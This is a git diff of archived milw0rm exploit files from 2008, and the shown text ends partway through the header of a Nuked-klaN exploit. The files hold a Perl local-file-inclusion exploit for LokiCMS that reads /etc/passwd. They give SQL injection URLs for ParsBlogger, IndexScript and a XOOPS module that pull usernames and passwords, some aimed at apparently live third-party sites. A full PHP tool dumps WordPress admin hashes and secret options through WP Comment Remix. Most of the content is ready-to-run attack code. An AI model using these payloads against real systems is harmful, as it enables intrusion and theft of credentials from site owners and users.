@@ -1,71 +1,71 @@ -# LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit -# url: http://www.lokicms.com/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Greetz To: All Hackers and milw0rm website -# -# *Requirements: magic_quotes_gpc = Off - ------------------------------------------------------------ -I had one idea when i saw http://milw0rm.com/exploits/6743 -I created the exploit that creates LFI. ------------------------------------------------------------ - -vuln file: admin.php -vuln code: - - case 'A_SAVE_G_SETTINGS': //save main settings - writeconfig ( $c_password, $_POST['title'], $_POST['header'], $_POST['tagline'], $_POST -['footnote'], $c_default, $_POST['theme'], $_POST['language'], $_POST['modrewrite'], $_POST['simplelink'], $_POST -['code'] ); - $c_theme = $_POST['theme']; - include PATH . '/includes/Config.php'; - include PATH . '/languages/' . $c_lang . '.lang.php'; --------> FUCKING THIS INCLUDE!!!! - $msg = $lang ['admin'] ['expressionSettingsSaved']; - break; - --------- -Exploit: --------- - -use LWP::UserAgent; - -unless ($ARGV[0] && $ARGV[1]) -{ - print "\n[x] LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit\n"; - print "[x] written by JosS - sys-project[at]hotmail.com\n"; - print "[x] usage: perl $0 [host] [path]\n"; - print "[x] example: perl $0 localhost /lokicms/ \n\n"; - exit(1); -} - -my $lwp = new LWP::UserAgent or die; - -my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . 
$ARGV[0]; - $target .= $ARGV[1] unless not defined $ARGV[1]; - $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; - -my $res = $lwp->post($target.'admin.php', - [ 'LokiACTION' => 'A_SAVE_G_SETTINGS', - 'language' => '../../../../../../../../../../etc/passwd%00']); - -if($res->is_error) -{ - print "[-] Exploit failed!\n"; - exit (); -} - --------- - -ENTERS ADMIN.PHP TO SEE /ETC/PASSWD - -Ingenious work :D - -# milw0rm.com [2008-10-13] +# LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit +# url: http://www.lokicms.com/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Greetz To: All Hackers and milw0rm website +# +# *Requirements: magic_quotes_gpc = Off + +----------------------------------------------------------- +I had one idea when i saw http://milw0rm.com/exploits/6743 +I created the exploit that creates LFI. +----------------------------------------------------------- + +vuln file: admin.php +vuln code: + + case 'A_SAVE_G_SETTINGS': //save main settings + writeconfig ( $c_password, $_POST['title'], $_POST['header'], $_POST['tagline'], $_POST +['footnote'], $c_default, $_POST['theme'], $_POST['language'], $_POST['modrewrite'], $_POST['simplelink'], $_POST +['code'] ); + $c_theme = $_POST['theme']; + include PATH . '/includes/Config.php'; + include PATH . '/languages/' . $c_lang . '.lang.php'; --------> FUCKING THIS INCLUDE!!!! 
+ $msg = $lang ['admin'] ['expressionSettingsSaved']; + break; + +-------- +Exploit: +-------- + +use LWP::UserAgent; + +unless ($ARGV[0] && $ARGV[1]) +{ + print "\n[x] LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit\n"; + print "[x] written by JosS - sys-project[at]hotmail.com\n"; + print "[x] usage: perl $0 [host] [path]\n"; + print "[x] example: perl $0 localhost /lokicms/ \n\n"; + exit(1); +} + +my $lwp = new LWP::UserAgent or die; + +my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; + $target .= $ARGV[1] unless not defined $ARGV[1]; + $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; + +my $res = $lwp->post($target.'admin.php', + [ 'LokiACTION' => 'A_SAVE_G_SETTINGS', + 'language' => '../../../../../../../../../../etc/passwd%00']); + +if($res->is_error) +{ + print "[-] Exploit failed!\n"; + exit (); +} + +-------- + +ENTERS ADMIN.PHP TO SEE /ETC/PASSWD + +Ingenious work :D + +# milw0rm.com [2008-10-13] diff --git a/platforms/php/webapps/6745.txt b/platforms/php/webapps/6745.txt index 6e08ba2fd..ed624bc33 100755 --- a/platforms/php/webapps/6745.txt +++ b/platforms/php/webapps/6745.txt 
@@ -1,45 +1,45 @@ -|___________________________________________________| -| -| ParsBlogger (links.asp id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| | -| -| script : http://www.parsblogger.com/demo.htm -| -| DorK : " ParsBlogger ? 2006. All rights reserved" -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer-- - -Demo - -http://www.shahedblog.com/blog/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer-- - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-10-13] +|___________________________________________________| +| +| ParsBlogger (links.asp id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| | +| +| script : http://www.parsblogger.com/demo.htm +| +| DorK : " ParsBlogger ? 2006. 
All rights reserved" +|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer-- + +Demo + +http://www.shahedblog.com/blog/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer-- + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-10-13] diff --git a/platforms/php/webapps/6746.txt b/platforms/php/webapps/6746.txt index 7382fb3c5..3c06a01b6 100755 --- a/platforms/php/webapps/6746.txt +++ b/platforms/php/webapps/6746.txt 
@@ -1,37 +1,37 @@ -[~]------------------------------------------------------------------------------------------------------------- -[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability -[~] -[~] http://www.indexscript.com/download.php -[~] -[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.] -[~] ------------------------------------------------------------------------------------------------------------ -[~] Bug founded by d3v1l [Avram Marius] -[~] -[~] Date: 12.10.2008 -[~] -[~] -[~] d3v1l@spoofer.com http://security-sh3ll.com -[~] -[~] ------------------------------------------------------------------------------------------------------------ -[~] Greetz tO ALL:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] Pentest| Gibon| Pig AND milw0rm staff -[~]------------------------------------------------------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- -[~] -[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login-- -[~] -[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat-- -[~] -[~] Example :- -[~] -[~] http://spaceho.com/sug_cat.php?parent_id=SQL -[~]------------------------------------------------------------------------------------------------------------- -[~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat] -[~]------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-10-13] +[~]------------------------------------------------------------------------------------------------------------- +[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability +[~] +[~] 
http://www.indexscript.com/download.php +[~] +[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.] +[~] ------------------------------------------------------------------------------------------------------------ +[~] Bug founded by d3v1l [Avram Marius] +[~] +[~] Date: 12.10.2008 +[~] +[~] +[~] d3v1l@spoofer.com http://security-sh3ll.com +[~] +[~] ------------------------------------------------------------------------------------------------------------ +[~] Greetz tO ALL:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] Pentest| Gibon| Pig AND milw0rm staff +[~]------------------------------------------------------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- +[~] +[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login-- +[~] +[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat-- +[~] +[~] Example :- +[~] +[~] http://spaceho.com/sug_cat.php?parent_id=SQL +[~]------------------------------------------------------------------------------------------------------------- +[~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat] +[~]------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-10-13] diff --git a/platforms/php/webapps/6747.php b/platforms/php/webapps/6747.php index 16750e08a..ccece805b 100755 --- a/platforms/php/webapps/6747.php +++ b/platforms/php/webapps/6747.php 
@@ -1,231 +1,231 @@ - - * - * Advisory: - * http://chxsecurity.org/advisories/adv-3-full.txt - * - * PoC Mirror: - * http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip - * - * Attention: - * This is a Proof-of-Concept it was never intended to be fully functional - * - * Notes: - * Uses cURL - */ - - // Script Header - function head() { - print "\n WP Comment Remix 1.4.3 SQL Injection"; - print "\n By g30rg3_x "; - print "\n ------------------------------------------------"; - print "\n This is a Proof-of-Concept it was never intended to be fully functional\n"; - } - - // Usage Information - function usage() { - global $argv; - head(); - print "\n Usage: php {$argv[0]} \n"; - print "\n : Hostname or IP Address"; - print "\n : Path to WordPress (Defaults to: /)"; - print "\n : Information to Extract (Defaults to: relevant)"; - print "\n dbinfo = Extract MySQL Current User, Database and Version"; - print "\n admins = Extract Only Admins (users with level 10)"; - print "\n users = Extract All Users (includes admins)"; - print "\n options = Extract Relevant Options like active_plugins, secret, ..."; - print "\n alloptions = Extrac All Options (Huge data would be directly printed out!)"; - print "\n relevant = dbinfo + admins + options"; - print "\n all = dbinfo + users + alloptions"; - print "\n : WordPress Tables Prefix (Defaults to: wp_)\n"; - print "\n Examples:"; - print "\n php {$argv[0]} foo.bar"; - print "\n php {$argv[0]} foo.bar /wordpress/"; - print "\n php {$argv[0]} foo.bar /wordpress/ all foo_"; - print "\n"; - exit(); - } - - // cURL HTTP GET - function GET($url) { - $ch = curl_init($url); - curl_setopt($ch, CURLOPT_HEADER, true); - curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close')); - curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); - curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept'); - $result = curl_exec($ch); - curl_close($ch); - - if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) 
) - return $result; - else - return false; - } - - // Obtain Database Information - function obtainDBInfo() { - global $prefix, $url; - $injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--'; - $result = GET($url . $injection); - preg_match_all('/user\{(?P.+)\}DB\{(?P.+)\}version\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER); - $db['user'] = $captured['user'][0]; - $db['name'] = $captured['DB'][0]; - $db['version'] = $captured['version'][0]; - return $db; - } - - // Obtain WordPress Users Information - function obtainUsersInfo($all = false) { - global $prefix, $url; - $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--'; - $result = GET($url . $injection); - preg_match_all('/user\{(?P.+)\}pass\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER); - for( $i = 0; $i < count($captured['user']); $i++ ) - $users[$captured['user'][$i]] = $captured['pass'][$i]; - return $users; - } - - // Obtain WordPress Options Information - function obtainOptionsInfo($all = false) { - global $prefix, $url; - $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--'; - $result = GET($url . $injection); - preg_match_all('%

    (?P.+)\{\|(?P.+)\|\}

    %', $result, $captured, PREG_PATTERN_ORDER); - for( $i = 0; $i < count($captured['name']); $i++ ) - $options[$captured['name'][$i]] = $captured['value'][$i]; - return $options; - } - - // Set no time limit (only if safe mode is off) - if ( !ini_get('safe_mode') ) - set_time_limit(0); - - // Print usage if there is no host - if ( !isset($argv[1]) ) - usage(); - - // Header, Arguments and Generate URL - head(); - $host = $argv[1]; - $path = isset($argv[2]) ? $argv[2] : '/'; - $info = isset($argv[3]) ? $argv[3] : 'relevant'; - $prefix = isset($argv[4]) ? $argv[4] : 'wp_'; - $url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0'; - - // Check if we can reach "ajax_comments.php" - print "\n Does ajax_comments.php exist? ... "; - $result = GET($url); - if ( !$result ) { - print "No"; - print "\n -----------------------------------------------------------"; - print "\n Seems that the site does not have WP Comment Remix installed"; - print "\n OR the path you proportionate is incorrect."; - print "\n Please review your arguments and try again.\n"; - exit(); - } - print 'Yes'; - - // Check if is it possible to inject... - // ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter - // the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default - // enviroment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve - // this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept. - print "\n Can we Inject SQL Code? ... "; - $result = GET($url . 
'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--'); - if ( preg_match('/There are no comments for this post/', $result) ) { - print "No"; - print "\n --------------------------------------"; - print "\n Seems that the host is already patched.\n"; - exit(); - } - print 'Yes'; - - // Check table prefix but don't check if the user selected to obtain database information. - if ( $info != 'dbinfo') { - print "\n Is \"{$prefix}\" the table prefix? ... "; - $result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--"); - if ( preg_match('/There are no comments for this post/', $result) ) { - print "No"; - print "\n ------------------------------------------------"; - print "\n Seems that the table prefix \"{$prefix}\" is incorrect."; - print "\n But this time we are not exiting, cause we can still extract"; - print "\n the database information, so m just going to change your choice"; - print "\n to dbinfo so you can still get that valuable information."; - print "\n ------------------------------------------------\n"; - $info = 'dbinfo'; - } else { - print 'Yes'; - } - } - - // Now is time to inject - print "\n\n Seems that everything is fine so now it's super fun time :P..."; - switch($info) { - case 'all': - $db = obtainDBInfo(); - $users = obtainUsersInfo(true); - $options = obtainOptionsInfo(true); - break; - case 'relevant': - $db = obtainDBInfo(); - $users = obtainUsersInfo(); - $options = obtainOptionsInfo(); - break; - case 'dbinfo': - $db = obtainDBInfo(); - break; - case 'admins': - $users = obtainUsersInfo(); - break; - case 'users': - $users = obtainUsersInfo(true); - break; - case 'options': - $options = obtainOptionsInfo(); - break; - case 'alloptions': - $options = obtainOptionsInfo(true); - break; - } - - /* It's Show Time */ - - // Database Information - if ( !empty($db) ) { - print "\n\n Database Information"; - print "\n ---------------------"; - print "\n MySQL User: {$db['user']}"; - print 
"\n MySQL Version: {$db['version']}"; - print "\n MySQL Database Name: {$db['name']}"; - } - - // Users Information - if ( !empty($users) ) { - print "\n\n Users"; - print "\n ---------"; - foreach( (array) $users as $user => $pass ) { - print "\n Username: {$user}"; - print "\n Password: {$pass} " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' ); - print "\n ---------"; - } - } - - // Options Information - if ( !empty($options) ) { - print "\n\n Options"; - print "\n ---------"; - foreach( (array) $options as $name => $value ) { - print "\n Name: {$name}"; - print "\n Value: {$value}"; - print "\n ---------"; - } - } - - // Good Bye =) - print "\n\n Have Fun! =)\n"; -?> - -# milw0rm.com [2008-10-14] + + * + * Advisory: + * http://chxsecurity.org/advisories/adv-3-full.txt + * + * PoC Mirror: + * http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip + * + * Attention: + * This is a Proof-of-Concept it was never intended to be fully functional + * + * Notes: + * Uses cURL + */ + + // Script Header + function head() { + print "\n WP Comment Remix 1.4.3 SQL Injection"; + print "\n By g30rg3_x "; + print "\n ------------------------------------------------"; + print "\n This is a Proof-of-Concept it was never intended to be fully functional\n"; + } + + // Usage Information + function usage() { + global $argv; + head(); + print "\n Usage: php {$argv[0]} \n"; + print "\n : Hostname or IP Address"; + print "\n : Path to WordPress (Defaults to: /)"; + print "\n : Information to Extract (Defaults to: relevant)"; + print "\n dbinfo = Extract MySQL Current User, Database and Version"; + print "\n admins = Extract Only Admins (users with level 10)"; + print "\n users = Extract All Users (includes admins)"; + print "\n options = Extract Relevant Options like active_plugins, secret, ..."; + print "\n alloptions = Extrac All Options (Huge data would be directly printed out!)"; + print "\n relevant = dbinfo + admins + options"; + print "\n all = dbinfo + users + 
alloptions"; + print "\n : WordPress Tables Prefix (Defaults to: wp_)\n"; + print "\n Examples:"; + print "\n php {$argv[0]} foo.bar"; + print "\n php {$argv[0]} foo.bar /wordpress/"; + print "\n php {$argv[0]} foo.bar /wordpress/ all foo_"; + print "\n"; + exit(); + } + + // cURL HTTP GET + function GET($url) { + $ch = curl_init($url); + curl_setopt($ch, CURLOPT_HEADER, true); + curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close')); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept'); + $result = curl_exec($ch); + curl_close($ch); + + if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) ) + return $result; + else + return false; + } + + // Obtain Database Information + function obtainDBInfo() { + global $prefix, $url; + $injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--'; + $result = GET($url . $injection); + preg_match_all('/user\{(?P.+)\}DB\{(?P.+)\}version\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER); + $db['user'] = $captured['user'][0]; + $db['name'] = $captured['DB'][0]; + $db['version'] = $captured['version'][0]; + return $db; + } + + // Obtain WordPress Users Information + function obtainUsersInfo($all = false) { + global $prefix, $url; + $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--'; + $result = GET($url . 
$injection); + preg_match_all('/user\{(?P.+)\}pass\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER); + for( $i = 0; $i < count($captured['user']); $i++ ) + $users[$captured['user'][$i]] = $captured['pass'][$i]; + return $users; + } + + // Obtain WordPress Options Information + function obtainOptionsInfo($all = false) { + global $prefix, $url; + $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--'; + $result = GET($url . $injection); + preg_match_all('%

    (?P.+)\{\|(?P.+)\|\}

    %', $result, $captured, PREG_PATTERN_ORDER); + for( $i = 0; $i < count($captured['name']); $i++ ) + $options[$captured['name'][$i]] = $captured['value'][$i]; + return $options; + } + + // Set no time limit (only if safe mode is off) + if ( !ini_get('safe_mode') ) + set_time_limit(0); + + // Print usage if there is no host + if ( !isset($argv[1]) ) + usage(); + + // Header, Arguments and Generate URL + head(); + $host = $argv[1]; + $path = isset($argv[2]) ? $argv[2] : '/'; + $info = isset($argv[3]) ? $argv[3] : 'relevant'; + $prefix = isset($argv[4]) ? $argv[4] : 'wp_'; + $url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0'; + + // Check if we can reach "ajax_comments.php" + print "\n Does ajax_comments.php exist? ... "; + $result = GET($url); + if ( !$result ) { + print "No"; + print "\n -----------------------------------------------------------"; + print "\n Seems that the site does not have WP Comment Remix installed"; + print "\n OR the path you proportionate is incorrect."; + print "\n Please review your arguments and try again.\n"; + exit(); + } + print 'Yes'; + + // Check if is it possible to inject... + // ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter + // the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default + // enviroment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve + // this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept. + print "\n Can we Inject SQL Code? ... "; + $result = GET($url . 
'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--'); + if ( preg_match('/There are no comments for this post/', $result) ) { + print "No"; + print "\n --------------------------------------"; + print "\n Seems that the host is already patched.\n"; + exit(); + } + print 'Yes'; + + // Check table prefix but don't check if the user selected to obtain database information. + if ( $info != 'dbinfo') { + print "\n Is \"{$prefix}\" the table prefix? ... "; + $result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--"); + if ( preg_match('/There are no comments for this post/', $result) ) { + print "No"; + print "\n ------------------------------------------------"; + print "\n Seems that the table prefix \"{$prefix}\" is incorrect."; + print "\n But this time we are not exiting, cause we can still extract"; + print "\n the database information, so m just going to change your choice"; + print "\n to dbinfo so you can still get that valuable information."; + print "\n ------------------------------------------------\n"; + $info = 'dbinfo'; + } else { + print 'Yes'; + } + } + + // Now is time to inject + print "\n\n Seems that everything is fine so now it's super fun time :P..."; + switch($info) { + case 'all': + $db = obtainDBInfo(); + $users = obtainUsersInfo(true); + $options = obtainOptionsInfo(true); + break; + case 'relevant': + $db = obtainDBInfo(); + $users = obtainUsersInfo(); + $options = obtainOptionsInfo(); + break; + case 'dbinfo': + $db = obtainDBInfo(); + break; + case 'admins': + $users = obtainUsersInfo(); + break; + case 'users': + $users = obtainUsersInfo(true); + break; + case 'options': + $options = obtainOptionsInfo(); + break; + case 'alloptions': + $options = obtainOptionsInfo(true); + break; + } + + /* It's Show Time */ + + // Database Information + if ( !empty($db) ) { + print "\n\n Database Information"; + print "\n ---------------------"; + print "\n MySQL User: {$db['user']}"; + print 
"\n MySQL Version: {$db['version']}"; + print "\n MySQL Database Name: {$db['name']}"; + } + + // Users Information + if ( !empty($users) ) { + print "\n\n Users"; + print "\n ---------"; + foreach( (array) $users as $user => $pass ) { + print "\n Username: {$user}"; + print "\n Password: {$pass} " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' ); + print "\n ---------"; + } + } + + // Options Information + if ( !empty($options) ) { + print "\n\n Options"; + print "\n ---------"; + foreach( (array) $options as $name => $value ) { + print "\n Name: {$name}"; + print "\n Value: {$value}"; + print "\n ---------"; + } + } + + // Good Bye =) + print "\n\n Have Fun! =)\n"; +?> + +# milw0rm.com [2008-10-14] diff --git a/platforms/php/webapps/6748.txt b/platforms/php/webapps/6748.txt index 0e6ca8f11..3f7952323 100755 --- a/platforms/php/webapps/6748.txt +++ b/platforms/php/webapps/6748.txt 
@@ -1,27 +1,27 @@ -########################################## -# -# XOOPS Module: xhresim All Version -# -# -########################################## -# -##AUTHOR : EcHoLL -####HOME : http://www.warezturk.org -# -####MAİL : echoll1983@hotmail.com -# -########################################### -# -# DORKS 1 : dork: /modules/xhresim/# -########################################### - - - - -target: http://scriptpage.com/modules/xhresim/index.php?no=[ Sql Code] - -sql code= 9999+union+select+0,concat(uname,0x3a,pass),2,3+from+xoops_users-- - -live link : http://www.sakakusu.net/saka/modules/xhresim/index.php?no=75+union+select+0,convert(database()%20using%20latin1),2,convert(user()%20using%20latin1)-- - -# milw0rm.com [2008-10-14] +########################################## +# +# XOOPS Module: xhresim All Version +# +# +########################################## +# +##AUTHOR : EcHoLL +####HOME : http://www.warezturk.org +# +####MAİL : echoll1983@hotmail.com +# +########################################### +# +# DORKS 1 : dork: /modules/xhresim/# +########################################### + + + + +target: http://scriptpage.com/modules/xhresim/index.php?no=[ Sql Code] + +sql code= 9999+union+select+0,concat(uname,0x3a,pass),2,3+from+xoops_users-- + +live link : http://www.sakakusu.net/saka/modules/xhresim/index.php?no=75+union+select+0,convert(database()%20using%20latin1),2,convert(user()%20using%20latin1)-- + +# milw0rm.com [2008-10-14] diff --git a/platforms/php/webapps/6749.php b/platforms/php/webapps/6749.php index 6fff34788..c0ef23696 100755 --- a/platforms/php/webapps/6749.php +++ b/platforms/php/webapps/6749.php 
@@ -1,1701 +1,1701 @@ - -# URL: http://real.o-n.fr/ -# Date: 14/10/2008 -# -# Special thanks to Louis for remembering me I had to finish it =) -# -# VULNERABILITY DETAILS -# --------------------- -# -# Nuked-klaN suffers from a vulnerability due to HTTP_REFERER, which is not -# correctly filtered before being inserted in nuked_stats_visitor table. -# -# If HTTP headers are not addslashes()'d by PHP, it could lead to a INSERT -# SQL injection. -# -# In function view_referer() (visits.php), referers are extracted from the -# database to perform an other SQL query, without being secured in between. -# This leads to a blind SQL injection. -# -# Theses injections are only possible if Nuked-klaN (NK) considers us as a -# new user, because else it won't touch the nuked_stats_visitor table. -# For this, we can use X-Forwarded-For HTTP header to specify NK a new IP, -# to be considered as a new user, and therefore access the database. -# NK automaticaly tries to resolve our host (using gethostbyaddr()), and it -# could be very long if the IP is not corresponding to a real one, because -# the default timeout is ~3 seconds, and that's very unconvenient for blind -# SQL injection. -# In order to solve this, we can try to generate IPs that might be valid, -# using, for example, a known BASE (the first two numbers), and randomizing -# the two other numbers. -# -# Stats can be disabled, or not accessible for users or visitors. -# In the last case we can't get query results, so the unique way to inject -# is BENCHMARK method, but this implies that the headers are not addslashed -# by PHP, but this method is not implemented in this exploit. -# -# If we got an admin session or login, we can spawn a remote shell/uploader -# using the NK "MySQL administration", but PHP safe_mode must be disabled. -# -# This exploit uses all these vulnerabilities to spawn a shell/uploader or -# to simply obtain admin credentials. 
-# -# EXPLOIT MAP -# ----------- -# -# (ERRORS ARE THIS WAY ->) -# -# +---------------------------+ -# | Check stats accessibility |->exit() -# +---------------------------+ -# | -# | +---------------------------------+ +-----------------------------------------------+ -# +->| Spoof referer to corrupt INSERT |->| Spoof referer to corrupt view_referer() query |->exit() -# | query and look for results | | (blind sql injection) | -# +---------------------------------+ +-----------------------------------------------+ -# | | -# | +--------------------------+ | +---------------------------------------------+ -# +->| Did we find an admin SID |<-----+ | We only have a login and a hashed password, | -# | or not ? |------->| we have to crack it and use -admin | -# +--------------------------+ +---------------------------------------------+ -# | -# | +-------------------------------------------------+ -# +->| Login as admin and spawn an uploader or a shell | -# | using "MySQL administration" | -# +-------------------------------------------------+ -# -# SOLUTION -# -------- -# The best way to secure your Nuked-klaN is disabling stats using the admin -# panel. -# If you wan't to keep stats activated, you have to addslashes HTTP_REFERER -# in nuked.php and in visits.php. -# -# -# THIS IS FOR EDUCATION PURPOSES ONLY, as usual. 
